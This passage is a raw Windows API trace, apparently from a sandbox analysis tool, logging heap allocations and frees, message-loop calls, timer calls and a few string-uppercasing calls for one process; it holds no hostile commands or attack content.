dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0262.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0262.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0262.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0262.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0262.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0262.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0262.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0262.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0262.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0262.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0262.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0262.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0262.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0262.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0262.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0262.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0262.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0262.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0262.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0262.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0262.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0262.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0262.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x3be0048 [0262.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0262.215] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0262.215] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0262.215] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0262.215] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0262.215] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0262.215] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0262.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0262.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0262.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0262.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0262.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0262.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0262.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0262.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0262.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0262.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0262.216] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0262.216] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0262.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0262.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0262.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0262.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0262.216] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0262.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0262.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0262.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0262.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0262.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0262.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0262.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0262.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0262.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0262.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0262.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0262.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0262.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x55008) returned 0x3cef8d0 [0262.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0262.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0262.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0262.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0262.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0262.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0262.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0262.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0262.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0262.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0262.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0262.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0262.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x55008) returned 0x3d448e0 [0262.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3cef8d0 | out: hHeap=0x970000) returned 1 [0262.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0262.331] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0262.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0262.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0262.331] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0262.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0262.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0262.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0262.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0262.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0262.331] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0262.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0262.331] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0262.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0262.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0262.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518f8 [0262.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0262.332] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0262.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0262.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0262.332] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0262.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0262.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0262.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a00 [0262.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0262.332] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0262.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0262.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0262.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0262.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0262.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0262.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0262.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0262.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0262.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0262.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a90 [0262.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0262.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ac0 [0262.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ad8 [0262.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51928 [0262.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0262.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0262.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518e0 [0262.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a48 [0262.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51af0 [0262.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0262.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0262.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0262.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0262.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0262.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0262.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0262.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0262.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0262.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0262.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0262.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0262.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0262.333] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0262.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0262.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0262.334] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0262.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0262.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0262.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0262.334] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0262.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0262.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0262.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b80 [0262.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0262.334] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0262.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0262.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0262.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0262.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0262.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0262.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0262.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0262.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0262.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0262.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0262.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0262.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0262.335] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0262.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0262.335] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0262.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0262.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0262.335] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0262.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0262.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0262.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0262.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0262.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0262.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0262.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0262.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0262.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0262.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0262.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x55008) returned 0x3cef8d0 [0262.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0262.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0262.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x55008) returned 0xe50048 [0262.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0262.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0262.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3cef8d0 | out: hHeap=0x970000) returned 1 [0262.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0262.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0262.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0262.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0262.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0262.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x55008) returned 0x3cef8d0 [0262.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe50048 | out: hHeap=0x970000) returned 1 [0262.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0262.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0262.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x55008) returned 0xe50048 [0262.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3cef8d0 | out: hHeap=0x970000) returned 1 [0262.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0262.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0262.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0262.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0262.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0262.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0262.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0262.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0262.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0262.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0262.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0262.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0262.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0262.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0262.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0262.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0262.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0262.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52018 | out: hHeap=0x970000) returned 1 [0262.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0262.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0262.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0262.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0262.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0262.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0262.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0262.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0262.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0262.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0262.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0262.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0262.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0262.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977de8 | out: hHeap=0x970000) returned 1 [0262.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0262.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c9a8c0 | out: hHeap=0x970000) returned 1 [0262.409] HeapFree (in: hHeap=0x970000, 